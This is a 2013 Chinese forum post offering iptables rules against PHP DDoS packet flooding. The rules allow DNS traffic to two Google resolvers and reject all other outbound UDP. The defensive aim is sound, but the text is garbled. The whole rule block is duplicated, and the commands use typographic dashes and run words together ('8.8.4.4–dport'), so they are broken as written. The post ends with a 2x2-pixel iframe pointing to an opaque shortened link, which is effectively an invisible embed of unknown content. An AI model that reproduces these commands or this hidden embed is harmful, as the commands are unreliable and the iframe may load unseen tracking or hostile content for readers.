linux系统 通过lptalbes禁止PHPDDOS发包
2013/4/4 1:50:00 人气 268 怀旧国机论坛虽然通过php.ini 能禁止
但是通过 linux 的iptables 能达到更好的效果,今天给大家打来的是Iptalbes禁止PHPDDOS发包
1 iptables -A INPUT -p tcp -m tcp –sport 53 –dport 1024:65535 -m state –state ESTABLISHED -j ACCEPT
2 iptables -A INPUT -p udp -m udp –sport 53 –dport 1024:65535 -m state –state ESTABLISHED -j ACCEPT
3 iptables -A OUTPUT -p tcp -m tcp –sport 1024:65535 -d 8.8.4.4–dport 53 -m state –state NEW,ESTABLISHED -j ACCEPT
4 iptables -A OUTPUT -p udp -m udp –sport 1024:65535 -d 8.8.8.8–dport 53 -m state –state NEW,ESTABLISHED -j ACCEPT
5 iptables -A OUTPUT -p udp -j REJECT
开放 对外 以及对内的 DNS端口 53
禁止其他全部出站的UDP 协议
但是通过 linux 的iptables 能达到更好的效果,今天给大家打来的是Iptalbes禁止PHPDDOS发包
1 iptables -A INPUT -p tcp -m tcp –sport 53 –dport 1024:65535 -m state –state ESTABLISHED -j ACCEPT
2 iptables -A INPUT -p udp -m udp –sport 53 –dport 1024:65535 -m state –state ESTABLISHED -j ACCEPT
3 iptables -A OUTPUT -p tcp -m tcp –sport 1024:65535 -d 8.8.4.4–dport 53 -m state –state NEW,ESTABLISHED -j ACCEPT
4 iptables -A OUTPUT -p udp -m udp –sport 1024:65535 -d 8.8.8.8–dport 53 -m state –state NEW,ESTABLISHED -j ACCEPT
5 iptables -A OUTPUT -p udp -j REJECT
开放 对外 以及对内的 DNS端口 53
禁止其他全部出站的UDP 协议
[iframe=2*2]http://url.cn/FLfTXA[/iframe]
暂无回复!
发表回复